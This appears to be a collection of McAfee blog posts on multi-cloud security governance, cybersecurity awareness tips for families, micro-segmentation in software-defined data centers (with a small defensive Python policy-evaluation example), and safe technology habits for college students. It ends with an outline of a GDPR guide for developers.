First and foremost, avoid looking at your new cloud infrastructure as a separate environment. It’s not merely a new data center, so an organization also needs to consider how switching to a cloud infrastructure will shift how the organization secures assets. Consider looking to resources like the MITRE ATT&CK matrix and the Center for Internet Security’s Basic and Foundational Controls list as a guide for answering this question: “In the future, how do I maintain unified visibility and security when I incorporate new cloud providers?”
For a successful multi-cloud migration, use your cloud access security layer and a platform that ultimately unifies your policy and threat identification approaches. Identity is another common challenge area. Moving to the cloud at scale often requires your organization to “clean up” your identity directory to be ready and accommodating of shared sign-on. By using an identity management and/or aggregation platform to expose identity to well-known cloud services, you will be able to ease the cloud implementation burden and threat exposure of any given provider.
It’s important to know that your organization’s compliance requirements are not mitigated or transmuted simply because the data has left your internal environment and entered the one your cloud provider(s) uses. As your organization matures, the way you manage and align your cloud provider’s capabilities to your compliance requirements should evolve accordingly.
Initially, ensure that your company requires business unit executives to apply or accept the risk of compliance obligations where service providers may not have every requirement. Your legal team should be a part of the initial purchase decisions, armed with technical knowledge to help identify potential “rogue” cloud services and policy guidelines that dissuade employees from adding services “on a credit card” without appropriate oversight.
As your organization gains more experience with the cloud, request that providers share copies of the SSAE16 attestations / audits. This, together with more formal due diligence processes, should become commonplace. Organizations looking to advance in this space would be well-advised to look at the Cloud Security Alliance’s STAR attestation and the associated Cloud Controls Matrix as a ready accelerator to benchmark cloud providers.
Approaching buy-in from exec/C-level on a multi-cloud strategy
Use of cloud services should reflect the strategic focus of the business. Technology leaders can leverage the benefits of these services to underpin initiatives in efficiency, bringing innovation to market and controlling costs. To strengthen this message, technology department heads should consider the metrics and operations adjustments that will allow them to demonstrate the enhanced value of the cloud beyond just the bottom line. If you are trying to get exec/C-level buy in, consider the following:
- How will you measure the speed of introducing new capabilities?
- Are new areas of value or product enhancement made possible through cloud services?
- How will the organization measure and control usage to hit your cost targets?
- How do you know whether your organization is getting what you have contracted for from cloud providers?
- Do you have a mechanism for commercial coverage of the organization when things go wrong?
Protect your organization and secure the cloud
Organizations will often “upgrade” in some areas of basic security (perimeter, basic request hygiene) when making the move to well-known cloud providers. How the overall security posture is affected depends heavily on the level of diligence that goes into onboarding new cloud providers. Implementing critical technical measures like the Cloud Access Security layer and policy around how the cloud is procured and technically implemented should drive basic control requirements.
We previously discussed the challenges of governing cloud and the maturity model that we use with customers to ascertain their readiness for new cloud providers.
As the number of cloud providers scales in the environment, your organization needs to assess and document them based on how much your organization depends on a given service and the sensitivity of the data those services will hold. Services that are prioritized higher on these two fronts should have increased organizational scrutiny and technical logging integration in order to maintain the overall defensive posture of the company.
As with any other technology trend, the missteps in making the transition to business and consumer cloud services have received outsized coverage. Take the time to dive into the “hows” and “whys” of early cloud breaches to avoid becoming a potential victim. A resource like the Cloud Security Alliance’s “Top Threats to Cloud Computing: Deep Dive” and McAfee’s report on “Practical Guidance and the State of Cloud Security” can be a great place to start.
Learning from someone else’s experiences is always highly preferred, though. After all, learning about cloud incident response after the fact can be a hard, costly lesson!
The post 5 Things Your Organization Needs to Know About Multi-Cloud appeared first on McAfee Blogs.
Don’t we all kinda secretly hope, even pretend, that our biggest fears are in the process of remedying themselves? Like believing that the police will know to stay close should we wander into a sketchy part of town. Or that our doors and windows will promptly self-lock should we forget to do so. Such a world would be ideal — and oh, so, peaceful — but it just isn’t reality. When it comes to making sure our families are safe we’ve got to be the ones to be aware, responsible, and take the needed action.
Our Shared Responsibility
This holds true in making the internet a safe place. As much as we’d like to pretend there’s a protective barrier between us and the bad guys online, there’s no single government entity that is solely responsible for securing the internet. Every individual must play his or her role in protecting their portion of cyberspace, including the devices and networks they use. And, that’s what October — National Cyber Security Awareness Month (NCSAM) — is all about.
At McAfee, we focus on these matters every day but this month especially, we are linking arms with safety organizations, bloggers, businesses, and YOU — parents, consumers, educators, and digital citizens — to zero in on ways we can all do our part to make the internet safe and secure for everyone. (Hey, sometimes the home team needs a huddle, right!?)
8 specific things you can do!
- Become a NCSAM Champion. The National Cyber Security Alliance (NCSA) is encouraging everyone — individuals, schools, businesses, government organizations, universities — to sign up, take action, and make a difference in online safety and security. It’s free and simple to register. Once you sign up you will get an email with a toolbox packed with fun, shareable memes to post for #CyberAware October.
- Tap your social powers. Throughout October, share, share, share great content you discover. Use the hashtag #CyberAware, so the safety conversation reaches and inspires more people. Also, join the Twitter chat using the hashtag #ChatSTC each Thursday in October at 3 p.m., ET/Noon, PT. Learn, connect with other parents and safety pros, and chime in.
- Hold a family tech talk. Be even more intentional this month. Learn and discuss suggestions from STOP. THINK. CONNECT. on how each family member can protect their devices and information.
- Print it and post it: Print out a STOP. THINK. CONNECT. tip sheet and display it in areas where family members spend time online.
- Understand and execute the basics. Information is awesome. But how much of that information do we truly put into action? Take 10 minutes to read 10 Tips to Stay Safe Online and another 10 minutes to make sure you take the time to install a firewall, strengthen your passwords, and make sure your home network is as secure as it can be.
- If you care — share! Send an email to friends and family informing them that October is National Cybersecurity Awareness Month and encourage them to visit staysafeonline.org for tips and resources.
- Turn on multi-factor authentication. Protect your financial, email and social media accounts with two-step authentication for passwords.
- Update, update, update! This overlooked but powerful way to shore up your devices is crucial. Update your software and turn on automatic updates to protect your home network and personal devices.
Isn’t it awesome to think that you aren’t alone in striving to keep your family’s digital life — and future — safe? A lot of people are working together during National Cyber Security Awareness Month to educate and be more proactive in blocking criminals online. Working together, no doubt, we’ll get there quicker and be able to create and enjoy a safer internet.
The post #CyberAware: Will You Help Make the Internet a Safe Place for Families? appeared first on McAfee Blogs.
For 57% of enterprise organizations in our latest survey on cloud adoption, IT infrastructure took the form of a hybrid cloud, i.e. a mix of public cloud infrastructure-as-a-service (IaaS) and some form of private cloud data center. At McAfee, we spend a lot of time speaking about the benefits of using public cloud infrastructure providers like AWS and Azure. We spend less time discussing private cloud, which today is increasingly software-defined, earning the name “software-defined data center” or SDDC.
Infrastructure designed to operate as an SDDC provides the flexibility of cloud with the most control possible over IT resources. That control enables well-defined security controls with the potential to rise above and beyond what many teams are used to having at their disposal in a traditional data center, particularly when it comes to micro-segmenting policy.
To start, the concept of software-defined data center describes an environment where compute, networking, and often storage are all virtualized and abstracted above the physical hardware they run on. VMware handles the largest share of these virtualized deployments, which is a natural extension of their long history of transforming single-purpose servers into far more cost-effective virtual server infrastructure. The big change here is adding network virtualization through their technology NSX, which frees the network from physical constraints and allows it to be software-defined.
In a physical network, your infrastructure has a perimeter which you allow traffic in/out of. This limits your control to the physical points where you can intercept that traffic. In a software-defined network (a critical part of a software-defined data center) your network can be controlled at every logical point in the virtual infrastructure. For a simple example, say you have 100 VMs running in 3 compliance-based groupings. Here is how your policy could be constructed at a high level in an SDDC:
- Group 1: PCI compliant storage. Every VM in this group is tagged for Group 1, and network traffic limited to internal IPs only.
- Group 2: GDPR compliant application with customer data. Again, each VM is tagged for its group to share the same policy, this time enforcing encryption and read-only access.
- Group 3: Mixed-use, general purpose VMs with varying compliance requirements. In this case, each VM needs its own policy. Some may be limited to single-IP access, others open to the internet. A per-VM policy effectively introduces micro-segmentation to your infrastructure.
The point of these basic examples is to clarify the opportunity that a software-defined data center has to fine-tune policy for your assets held on-premises. If you’re also running in AWS or Azure, then what you’ve kept on-premises likely consists of your most sensitive assets, which require the most stringent protection. Controlling policy down to the individual VM gives you this flexibility. Once you’re controlling policy at the VM-level, you can also monitor and control the communication between those VMs (i.e. east-west or intra-VM), stopping lateral threat movement from one VM to another within your data center.
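The three groupings above, as an added example that is not McAfee's or VMware's code: a small tag-based policy evaluator in which Groups 1 and 2 share one policy per tag, Group 3 carries one policy per VM, and every flow, including east-west traffic between VMs, is checked against the destination's policy with default deny. VM names, addresses and the policy values are constructed.

```python
"""Added illustration of tag-based micro-segmentation policy evaluation.
Not NSX's policy model; all names, addresses and rules are constructed."""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class VM:
    name: str
    ip: str
    tag: str   # "pci", "gdpr" or "general"


@dataclass(frozen=True)
class Policy:
    allow_sources: tuple      # CIDRs the VM may receive traffic from
    require_encryption: bool  # drop cleartext flows
    read_only: bool           # drop anything but read operations


DENY_ALL = Policy(allow_sources=(), require_encryption=True, read_only=True)

# Group 1 and Group 2: every VM with the tag shares the group policy.
GROUP_POLICIES = {
    "pci": Policy(("10.0.0.0/8",), require_encryption=False, read_only=False),  # internal IPs only
    "gdpr": Policy(("10.0.0.0/8",), require_encryption=True, read_only=True),   # encrypted, read-only
}

# Group 3: per-VM policy, i.e. micro-segmentation.
VM_POLICIES = {
    "web-01": Policy(("0.0.0.0/0",), require_encryption=True, read_only=False),    # open to the internet
    "admin-01": Policy(("10.1.1.5/32",), require_encryption=True, read_only=False),  # single jump host
}


def policy_for(vm):
    """Per-VM policy for general-purpose VMs, group policy otherwise; unknown VMs get deny-all."""
    if vm.tag == "general":
        return VM_POLICIES.get(vm.name, DENY_ALL)
    return GROUP_POLICIES.get(vm.tag, DENY_ALL)


def source_allowed(src_ip, policy):
    addr = ipaddress.ip_address(src_ip)
    return any(addr in ipaddress.ip_network(cidr) for cidr in policy.allow_sources)


def evaluate(src_ip, dst, encrypted, op):
    """Decide one flow to VM dst. Returns (allowed, reason). The same check applies
    whether src_ip is outside the data center or another VM inside it."""
    policy = policy_for(dst)
    if not source_allowed(src_ip, policy):
        return False, f"{src_ip} is not permitted to reach {dst.name}"
    if policy.require_encryption and not encrypted:
        return False, f"cleartext traffic to {dst.name} is not permitted"
    if policy.read_only and op != "read":
        return False, f"{op} to {dst.name} is not permitted (read-only)"
    return True, "allowed"


def audit(flows):
    """Evaluate a list of (src_ip, dst, encrypted, op) and return the denied ones with reasons."""
    return [(src, dst.name, evaluate(src, dst, enc, op)[1])
            for src, dst, enc, op in flows if not evaluate(src, dst, enc, op)[0]]
```

The lateral-movement case is the interesting one: an internet-facing `web-01` at `10.2.0.10` is inside `10.0.0.0/8`, so it can reach the PCI storage group, but it cannot reach `admin-01`, whose per-VM policy admits only the jump host.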
If you’re in a state where certain assets simply can’t enter the public cloud, and you want to make improvements in your resource efficiency and protection strategy, you should consider building out a plan to completely virtualize your data center, including the network. To help you with that strategy, we partnered with VMware and research firm IDC to write a short paper on the security benefits of adopting a software-defined data center. You can read it here to dive deeper into this topic.
The post Moving to a Software-Defined Data Center and Its Impact on Security appeared first on McAfee Blogs.
You’ve loved, shaped, and equipped your child to succeed in college and move in day is finally here. But there’s still one variable that can turn your child’s freshman year upside down, and that’s technology.
That’s right, that essential laptop and indispensable smartphone your child owns could also prove to be his or her biggest headache if not secured and used responsibly. College students can be targets of identity theft, malware, online scams, credit card fraud, property theft, and internet addiction.
The other part of this new equation? You, parent, are no longer in the picture. Your child is now 100% on his or her own. Equipping time is over. Weekly tech monitoring and family chats are in the rearview mirror. Will they succeed? Of course, they will. But one last parenting chat on safety sure can’t hurt. Here are a couple of reminders to share with your college-bound kids.
7 Technology Habits for Students
1. Minimize use of public computers. Campuses rely on shared computers. Because campus networks aren’t always secure, this can open you up to identity theft. If you have to log on to a public computer be it a cafe, library, or lab, be sure to change any passwords each time you return. If you are working with a study group, don’t share passwords. Public devices can be prone to hackers seeking to steal login credentials and credit card numbers. If you do use public devices, get in the habit of browsing in the privacy mode. Clear browser history, cookies, and quit all applications before logging off.
2. Beware when shopping online. Online shopping is often the easiest way for students to purchase essentials. Be sure to use a secure internet connection when hitting that “purchase” button. Reputable sites encrypt data during transactions by using SSL technologies. Look for the tiny padlock icon in the address bar or a URL that begins with “https” (the “s” stands for secure) instead of “http.” Examine the site and look for misspellings, inconsistencies. Go with your instincts if you think a website is bogus, don’t risk the purchase. Online credit card fraud is on the rise, so beware.
3. Guard your privacy. College is a tough place to learn that not all people are trustworthy — even those who appear to be friends. Sadly, many kids learn about online theft the hard way. Never share passwords, credit card numbers, or student ID numbers. Be aware of shoulder surfing which is when someone peers over your shoulder to see what’s on your computer screen. Avoid leaving computer screens open in dorm rooms or libraries where anyone can check your browsing history, use an open screen, or access financial information. Also, never lend your laptop or tablet to someone else since it houses personal information and make sure that all of your screens are password protected.
4. Beware of campus crooks. Thieves troll college campuses looking for opportunities to steal smartphones, laptops, wearables, and tablets for personal use or resale. Don’t carry your tech around uncased or leave it unguarded. Conceal it in a backpack. Even if you feel comfortable in your new community, don’t leave your phone even for a few seconds to pick up your food or coffee at a nearby counter. If you are in the library or study lab and need a bathroom break, take your laptop with you. Thieves are swift, and you don’t want to lose a semester’s worth of work in a matter of seconds.
5. Use public Wi-Fi with caution. Everyone loves to meet at the coffee shop for study sessions, and that includes hackers. Yes, it's convenient, but use public Wi-Fi with care. Consider using VPN software, which encrypts your traffic between your laptop and the VPN provider so that others on the same network can't read or tamper with it (it does not, on its own, protect the laptop from malware or stop you from visiting a malicious site). To protect yourself, use a strong, unique password for every account, and change a password promptly if you suspect it has been exposed. This is easy if you use a free password manager like True Key.
6. Social media = productivity killer. Be aware of your online time. Mindless surfing, internet games, and excessive video gaming with roommates can have an adverse effect on your grades as well as your mental health. Use website blockers to help protect your study time.
7. Social media = career killer. We can all agree: College is a blast. However, keep the party photos and inappropriate captions offline. Your career will thank you. Remember: Almost everything you do today is being captured or recorded, even if you're not the one with the camera. The internet is forever, and a long-forgotten photo can make its way back around when you least expect it.
8. Don’t get too comfortable too fast. Until you know whom you can trust in your new community, consider setting your social media accounts to private. Turn off location sharing in mobile apps, and don't post your home or dorm address, email, or phone number. While it may be the farthest thing from your mind right now, campus stalking cases are real.
The post College Bound? 7 Important Technology Habits for Students appeared first on McAfee Blogs.
Developing GDPR-Compliant Applications: Guidance
Guidance for application developers on building GDPR-compliant applications, in three parts.
- Part 1: A Developer's Guide to the GDPR
- Part 2: Application Privacy by Design
- Part 3: Minimizing Application Privacy Risk
The General Data Protection Regulation (GDPR) was adopted by the European Parliament and Council to strengthen and unify Europe's data protection law, replacing the 1995 Data Protection Directive (95/46/EC). Although the GDPR is a European Union (EU) regulation, its territorial scope (Article 3) extends to organizations outside the EU that process the personal data of individuals in the EU, whether by offering them goods or services or by monitoring their behaviour. This includes the development of applications intended to process the personal data of people in the EU. Therefore, organizations that provide web applications, mobile apps, or traditional desktop applications that directly or indirectly process such personal data, or that allow people in the EU to sign in, are subject to the GDPR's privacy obligations, and they face significant administrative fines should their applications fail to comply.
Part 1: A Developer's Guide to the GDPR
Part 1 summarizes the GDPR and explains how the regulation applies to developing and supporting applications that are intended to be used by people in the European Union.
Part 2: Application Privacy by Design
Part 3: Minimizing Application Privacy Risk
Part 3 provides practical application development techniques that reduce an application's privacy risk.